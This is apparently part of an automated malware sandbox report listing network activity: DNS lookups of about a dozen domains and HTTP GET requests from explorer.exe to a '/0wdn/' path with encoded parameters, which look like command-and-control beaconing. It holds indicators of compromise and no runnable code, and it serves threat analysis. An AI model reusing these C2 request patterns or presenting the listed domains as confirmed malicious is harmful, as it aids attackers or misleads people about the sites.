                                                                                              Feb 23, 2021 09:40:03.546781063 CET4974380192.168.2.5194.9.94.85
                                                                                              Feb 23, 2021 09:40:03.546897888 CET4974380192.168.2.5194.9.94.85
                                                                                              Feb 23, 2021 09:40:03.547061920 CET4974380192.168.2.5194.9.94.85
                                                                                              Feb 23, 2021 09:40:08.647533894 CET4974480192.168.2.5194.59.164.34
                                                                                              Feb 23, 2021 09:40:09.038208961 CET8049744194.59.164.34192.168.2.5
                                                                                              Feb 23, 2021 09:40:09.038321018 CET4974480192.168.2.5194.59.164.34
                                                                                              Feb 23, 2021 09:40:09.038458109 CET4974480192.168.2.5194.59.164.34
                                                                                              Feb 23, 2021 09:40:09.429066896 CET8049744194.59.164.34192.168.2.5
                                                                                              Feb 23, 2021 09:40:09.429874897 CET8049744194.59.164.34192.168.2.5
                                                                                              Feb 23, 2021 09:40:09.429898024 CET8049744194.59.164.34192.168.2.5
                                                                                              Feb 23, 2021 09:40:09.429910898 CET8049744194.59.164.34192.168.2.5
                                                                                              Feb 23, 2021 09:40:09.429923058 CET8049744194.59.164.34192.168.2.5
                                                                                              Feb 23, 2021 09:40:09.430167913 CET4974480192.168.2.5194.59.164.34
                                                                                              Feb 23, 2021 09:40:09.430193901 CET4974480192.168.2.5194.59.164.34
                                                                                              Feb 23, 2021 09:40:09.430233955 CET4974480192.168.2.5194.59.164.34
                                                                                              Feb 23, 2021 09:40:09.822710037 CET8049744194.59.164.34192.168.2.5

                                                                                              UDP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Feb 23, 2021 09:38:02.505060911 CET5270453192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:38:02.558099985 CET53527048.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:38:02.710143089 CET5221253192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:38:02.761518955 CET53522128.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:38:02.787749052 CET5430253192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:38:02.836307049 CET53543028.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:38:02.928085089 CET5378453192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:38:02.976670027 CET53537848.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:38:03.854566097 CET6530753192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:38:03.881243944 CET6434453192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:38:03.906522036 CET53653078.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:38:03.910783052 CET6206053192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:38:03.930617094 CET53643448.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:38:03.959408045 CET53620608.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:38:05.107301950 CET6180553192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:38:05.156344891 CET53618058.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:38:06.091387987 CET5479553192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:38:06.150312901 CET53547958.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:38:06.371265888 CET4955753192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:38:06.419986963 CET53495578.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:38:07.559832096 CET6173353192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:38:07.608767033 CET53617338.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:38:08.867094040 CET6544753192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:38:08.921020985 CET53654478.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:38:10.289885044 CET5244153192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:38:10.346569061 CET53524418.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:38:12.428487062 CET6217653192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:38:12.477117062 CET53621768.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:38:16.062007904 CET5959653192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:38:16.113447905 CET53595968.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:38:17.056768894 CET6529653192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:38:17.109467983 CET53652968.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:38:18.313127041 CET6318353192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:38:18.361856937 CET53631838.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:38:21.820666075 CET6015153192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:38:21.873004913 CET53601518.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:38:30.005348921 CET5696953192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:38:30.066828012 CET53569698.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:38:42.326093912 CET5516153192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:38:42.377578974 CET53551618.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:38:58.038872957 CET5475753192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:38:58.101281881 CET53547578.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:38:58.983453035 CET4999253192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:38:59.052273035 CET53499928.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:38:59.117753029 CET6007553192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:38:59.168037891 CET53600758.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:39:05.469280005 CET5501653192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:39:05.517968893 CET53550168.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:39:08.852982998 CET6434553192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:39:09.070103884 CET53643458.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:39:13.727977037 CET5712853192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:39:13.787894964 CET53571288.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:39:19.103014946 CET5479153192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:39:19.169167042 CET53547918.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:39:24.871124983 CET5046353192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:39:24.941981077 CET53504638.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:39:29.962445021 CET5039453192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:39:30.106431007 CET53503948.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:39:35.671660900 CET5853053192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:39:35.745763063 CET53585308.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:39:39.324681044 CET5381353192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:39:39.398113012 CET53538138.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:39:40.466918945 CET6373253192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:39:40.540991068 CET53637328.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:39:41.340522051 CET5734453192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:39:41.344240904 CET5445053192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:39:41.397864103 CET53573448.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:39:41.814722061 CET53544508.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:39:41.903491974 CET5926153192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:39:41.960423946 CET53592618.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:39:42.434211016 CET5715153192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:39:42.512608051 CET53571518.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:39:43.085506916 CET5941353192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:39:43.145399094 CET53594138.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:39:43.567975044 CET6051653192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:39:43.637036085 CET53605168.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:39:43.783298016 CET5164953192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:39:43.845468044 CET53516498.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:39:44.736867905 CET6508653192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:39:44.799204111 CET53650868.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:39:45.650104046 CET5643253192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:39:45.701723099 CET53564328.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:39:46.171679974 CET5292953192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:39:46.231209993 CET53529298.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:39:46.825200081 CET6431753192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:39:46.897975922 CET53643178.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:39:52.012540102 CET6100453192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:39:53.022897005 CET6100453192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:39:53.090861082 CET53610048.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:39:58.237720013 CET5689553192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:39:58.308913946 CET53568958.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:40:03.325084925 CET6237253192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:40:03.417793036 CET53623728.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:40:08.564743996 CET6151553192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:40:08.646218061 CET53615158.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:40:14.450964928 CET5667553192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:40:14.522613049 CET53566758.8.8.8192.168.2.5
                                                                                              Feb 23, 2021 09:40:19.526774883 CET5717253192.168.2.58.8.8.8
                                                                                              Feb 23, 2021 09:40:19.689696074 CET53571728.8.8.8192.168.2.5

                                                                                              DNS Queries

                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                              Feb 23, 2021 09:39:08.852982998 CET192.168.2.58.8.8.80x6c06Standard query (0)www.diabetessurgeryturkey.comA (IP address)IN (0x0001)
                                                                                              Feb 23, 2021 09:39:19.103014946 CET192.168.2.58.8.8.80xc795Standard query (0)www.mojavewellnessaz.comA (IP address)IN (0x0001)
                                                                                              Feb 23, 2021 09:39:24.871124983 CET192.168.2.58.8.8.80x81c3Standard query (0)www.vanjele.comA (IP address)IN (0x0001)
                                                                                              Feb 23, 2021 09:39:29.962445021 CET192.168.2.58.8.8.80x2992Standard query (0)www.ficuswildlife.comA (IP address)IN (0x0001)
                                                                                              Feb 23, 2021 09:39:35.671660900 CET192.168.2.58.8.8.80xe2fbStandard query (0)www.thisisauckland.comA (IP address)IN (0x0001)
                                                                                              Feb 23, 2021 09:39:41.344240904 CET192.168.2.58.8.8.80x91d2Standard query (0)www.topkids.asiaA (IP address)IN (0x0001)
                                                                                              Feb 23, 2021 09:39:46.825200081 CET192.168.2.58.8.8.80xe71dStandard query (0)www.trainingkanban.comA (IP address)IN (0x0001)
                                                                                              Feb 23, 2021 09:39:52.012540102 CET192.168.2.58.8.8.80x725Standard query (0)www.sphenecouture.comA (IP address)IN (0x0001)
                                                                                              Feb 23, 2021 09:39:53.022897005 CET192.168.2.58.8.8.80x725Standard query (0)www.sphenecouture.comA (IP address)IN (0x0001)
                                                                                              Feb 23, 2021 09:39:58.237720013 CET192.168.2.58.8.8.80x48f1Standard query (0)www.xlkefu2.comA (IP address)IN (0x0001)
                                                                                              Feb 23, 2021 09:40:03.325084925 CET192.168.2.58.8.8.80xdf8eStandard query (0)www.dorteklarskov.comA (IP address)IN (0x0001)
                                                                                              Feb 23, 2021 09:40:08.564743996 CET192.168.2.58.8.8.80x1ba5Standard query (0)www.gurumanindustries.comA (IP address)IN (0x0001)
                                                                                              Feb 23, 2021 09:40:14.450964928 CET192.168.2.58.8.8.80xe2adStandard query (0)www.thedesailldada.comA (IP address)IN (0x0001)
                                                                                              Feb 23, 2021 09:40:19.526774883 CET192.168.2.58.8.8.80x2931Standard query (0)www.buildermarketingprogram.comA (IP address)IN (0x0001)

                                                                                              DNS Answers

                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                              Feb 23, 2021 09:39:09.070103884 CET8.8.8.8192.168.2.50x6c06Server failure (2)www.diabetessurgeryturkey.comnonenoneA (IP address)IN (0x0001)
                                                                                              Feb 23, 2021 09:39:19.169167042 CET8.8.8.8192.168.2.50xc795No error (0)www.mojavewellnessaz.commojavewellnessaz.comCNAME (Canonical name)IN (0x0001)
                                                                                              Feb 23, 2021 09:39:19.169167042 CET8.8.8.8192.168.2.50xc795No error (0)mojavewellnessaz.com107.180.46.143A (IP address)IN (0x0001)
                                                                                              Feb 23, 2021 09:39:24.941981077 CET8.8.8.8192.168.2.50x81c3Name error (3)www.vanjele.comnonenoneA (IP address)IN (0x0001)
                                                                                              Feb 23, 2021 09:39:30.106431007 CET8.8.8.8192.168.2.50x2992No error (0)www.ficuswildlife.com138.197.103.178A (IP address)IN (0x0001)
                                                                                              Feb 23, 2021 09:39:35.745763063 CET8.8.8.8192.168.2.50xe2fbNo error (0)www.thisisauckland.comthisisauckland.comCNAME (Canonical name)IN (0x0001)
                                                                                              Feb 23, 2021 09:39:35.745763063 CET8.8.8.8192.168.2.50xe2fbNo error (0)thisisauckland.com77.72.1.202A (IP address)IN (0x0001)
                                                                                              Feb 23, 2021 09:39:41.814722061 CET8.8.8.8192.168.2.50x91d2Name error (3)www.topkids.asianonenoneA (IP address)IN (0x0001)
                                                                                              Feb 23, 2021 09:39:46.897975922 CET8.8.8.8192.168.2.50xe71dNo error (0)www.trainingkanban.com51.83.43.226A (IP address)IN (0x0001)
                                                                                              Feb 23, 2021 09:39:53.090861082 CET8.8.8.8192.168.2.50x725No error (0)www.sphenecouture.comsphenecouture.comCNAME (Canonical name)IN (0x0001)
                                                                                              Feb 23, 2021 09:39:53.090861082 CET8.8.8.8192.168.2.50x725No error (0)sphenecouture.com160.153.133.87A (IP address)IN (0x0001)
                                                                                              Feb 23, 2021 09:39:58.308913946 CET8.8.8.8192.168.2.50x48f1Name error (3)www.xlkefu2.comnonenoneA (IP address)IN (0x0001)
                                                                                              Feb 23, 2021 09:40:03.417793036 CET8.8.8.8192.168.2.50xdf8eNo error (0)www.dorteklarskov.com194.9.94.85A (IP address)IN (0x0001)
                                                                                              Feb 23, 2021 09:40:03.417793036 CET8.8.8.8192.168.2.50xdf8eNo error (0)www.dorteklarskov.com194.9.94.86A (IP address)IN (0x0001)
                                                                                              Feb 23, 2021 09:40:08.646218061 CET8.8.8.8192.168.2.50x1ba5No error (0)www.gurumanindustries.comgurumanindustries.comCNAME (Canonical name)IN (0x0001)
                                                                                              Feb 23, 2021 09:40:08.646218061 CET8.8.8.8192.168.2.50x1ba5No error (0)gurumanindustries.com194.59.164.34A (IP address)IN (0x0001)
                                                                                              Feb 23, 2021 09:40:14.522613049 CET8.8.8.8192.168.2.50xe2adName error (3)www.thedesailldada.comnonenoneA (IP address)IN (0x0001)
                                                                                              Feb 23, 2021 09:40:19.689696074 CET8.8.8.8192.168.2.50x2931No error (0)www.buildermarketingprogram.com208.97.149.17A (IP address)IN (0x0001)

                                                                                              HTTP Request Dependency Graph

                                                                                              • www.mojavewellnessaz.com
                                                                                              • www.ficuswildlife.com
                                                                                              • www.thisisauckland.com
                                                                                              • www.trainingkanban.com
                                                                                              • www.sphenecouture.com
                                                                                              • www.dorteklarskov.com
                                                                                              • www.gurumanindustries.com

                                                                                              HTTP Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              0192.168.2.549727107.180.46.14380C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Feb 23, 2021 09:39:19.310297966 CET4792OUTGET /0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=VISJTRF+R7Uh4mUWzRN0LlryAyb8IKpBE9z8YS+GNikClX9Lr80MYD+giceidMXBN5T1 HTTP/1.1
                                                                                              Host: www.mojavewellnessaz.com
                                                                                              Connection: close
                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                              Data Ascii:
                                                                                              Feb 23, 2021 09:39:20.749190092 CET5336INHTTP/1.1 301 Moved Permanently
                                                                                              Date: Tue, 23 Feb 2021 08:39:19 GMT
                                                                                              Server: Apache
                                                                                              X-Powered-By: PHP/5.6.40
                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                              X-Redirect-By: WordPress
                                                                                              Upgrade: h2,h2c
                                                                                              Connection: Upgrade, close
                                                                                              Location: http://mojavewellnessaz.com/0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=VISJTRF+R7Uh4mUWzRN0LlryAyb8IKpBE9z8YS+GNikClX9Lr80MYD+giceidMXBN5T1
                                                                                              Vary: User-Agent
                                                                                              Content-Length: 0
                                                                                              Content-Type: text/html; charset=UTF-8


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              1192.168.2.549728138.197.103.17880C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Feb 23, 2021 09:39:30.249361038 CET10856OUTGET /0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=OUgIxUFsYGQ41w7hQC/DBdH1JHjC++6nioh90AjecgG3yuW0+eUvoDUl1UqOD/TLQ8Us HTTP/1.1
                                                                                              Host: www.ficuswildlife.com
                                                                                              Connection: close
                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                              Data Ascii:
                                                                                              Feb 23, 2021 09:39:30.375597954 CET10857INHTTP/1.1 301 Moved Permanently
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Location: /redirect.php?host=www.ficuswildlife.com
                                                                                              Server: Caddy
                                                                                              Date: Tue, 23 Feb 2021 08:39:30 GMT
                                                                                              Content-Length: 75
                                                                                              Connection: close
                                                                                              Data Raw: 3c 61 20 68 72 65 66 3d 22 2f 72 65 64 69 72 65 63 74 2e 70 68 70 3f 68 6f 73 74 3d 77 77 77 2e 66 69 63 75 73 77 69 6c 64 6c 69 66 65 2e 63 6f 6d 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 61 3e 2e 0a 0a
                                                                                              Data Ascii: <a href="/redirect.php?host=www.ficuswildlife.com">Moved Permanently</a>.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              2192.168.2.54972977.72.1.20280C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Feb 23, 2021 09:39:35.799494028 CET10858OUTGET /0wdn/?nfuxZr=XqoKlbUxH4MvhR3WHn/bEyJILpMTXi5akImeFCcaj/eQm8+DbVPpEujjk99LtX7zxOgw&v2MHc=3fPHVZWhu2EdAZf0 HTTP/1.1
                                                                                              Host: www.thisisauckland.com
                                                                                              Connection: close
                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                              Data Ascii:
                                                                                              Feb 23, 2021 09:39:36.506441116 CET10859INHTTP/1.1 301 Moved Permanently
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                              X-Redirect-By: WordPress
                                                                                              Location: http://thisisauckland.com/0wdn/?nfuxZr=XqoKlbUxH4MvhR3WHn/bEyJILpMTXi5akImeFCcaj/eQm8+DbVPpEujjk99LtX7zxOgw&v2MHc=3fPHVZWhu2EdAZf0
                                                                                              X-Litespeed-Cache: miss
                                                                                              Content-Length: 0
                                                                                              Date: Tue, 23 Feb 2021 08:39:36 GMT
                                                                                              Server: LiteSpeed
                                                                                              Vary: User-Agent


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              3192.168.2.54974151.83.43.22680C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Feb 23, 2021 09:39:46.953430891 CET11756OUTGET /0wdn/?nfuxZr=ix6ctNvA27TkjcVVjU84nkoRBhFOceD1ut/SMPDHN4oqZYjnQY/2eO9u+VnCkR9n2BIl&v2MHc=3fPHVZWhu2EdAZf0 HTTP/1.1
                                                                                              Host: www.trainingkanban.com
                                                                                              Connection: close
                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                              Data Ascii:
                                                                                              Feb 23, 2021 09:39:47.003861904 CET11757INHTTP/1.1 301 Moved Permanently
                                                                                              Date: Tue, 23 Feb 2021 08:39:46 GMT
                                                                                              Server: Apache/2.4.29 (Ubuntu)
                                                                                              Location: https://www.trainingkanban.com/0wdn/?nfuxZr=ix6ctNvA27TkjcVVjU84nkoRBhFOceD1ut/SMPDHN4oqZYjnQY/2eO9u+VnCkR9n2BIl&v2MHc=3fPHVZWhu2EdAZf0
                                                                                              Content-Length: 435
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 72 61 69 6e 69 6e 67 6b 61 6e 62 61 6e 2e 63 6f 6d 2f 30 77 64 6e 2f 3f 6e 66 75 78 5a 72 3d 69 78 36 63 74 4e 76 41 32 37 54 6b 6a 63 56 56 6a 55 38 34 6e 6b 6f 52 42 68 46 4f 63 65 44 31 75 74 2f 53 4d 50 44 48 4e 34 6f 71 5a 59 6a 6e 51 59 2f 32 65 4f 39 75 2b 56 6e 43 6b 52 39 6e 32 42 49 6c 26 61 6d 70 3b 76 32 4d 48 63 3d 33 66 50 48 56 5a 57 68 75 32 45 64 41 5a 66 30 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 72 61 69 6e 69 6e 67 6b 61 6e 62 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.trainingkanban.com/0wdn/?nfuxZr=ix6ctNvA27TkjcVVjU84nkoRBhFOceD1ut/SMPDHN4oqZYjnQY/2eO9u+VnCkR9n2BIl&amp;v2MHc=3fPHVZWhu2EdAZf0">here</a>.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.trainingkanban.com Port 80</address></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              4192.168.2.549742160.153.133.8780C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Feb 23, 2021 09:39:53.143121958 CET11759OUTGET /0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=BtLwtEoUFNWHbVqCGleqoAdl9A252xhpwrcAYeIb01MyTz4m47Yt/ZHU9A+9eyld1TIt HTTP/1.1
                                                                                              Host: www.sphenecouture.com
                                                                                              Connection: close
                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                              Data Ascii:
                                                                                              Feb 23, 2021 09:39:53.203397036 CET11761INHTTP/1.1 404 Not Found
                                                                                              Date: Tue, 23 Feb 2021 08:39:53 GMT
                                                                                              Server: Apache
                                                                                              Upgrade: h2,h2c
                                                                                              Connection: Upgrade, close
                                                                                              Accept-Ranges: bytes
                                                                                              Vary: Accept-Encoding,User-Agent
                                                                                              Content-Length: 1699
                                                                                              Content-Type: text/html
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 65 65 3b 0a 7d 0a 0a 62 6f 64 79 2c 20 68 31 2c 20 70 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 53 65 67 6f 65 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 37 37 70 78 3b 0a 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 37 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 35 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 7d 0a 0a 2e 72 6f 77 3a 62 65 66 6f 72 65 2c 20 2e 72 6f 77 3a 61 66 74 65 72 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 20 22 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 36 20 7b 0a 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 35 25 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 38 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 20 30 3b 0a 7d 0a 0a 2e 6c 65 61 64 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 7d 0a 0a 70 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 30 70 78 3b 0a 7d 0a 0a 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 33 32 38 32 65 36 3b 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 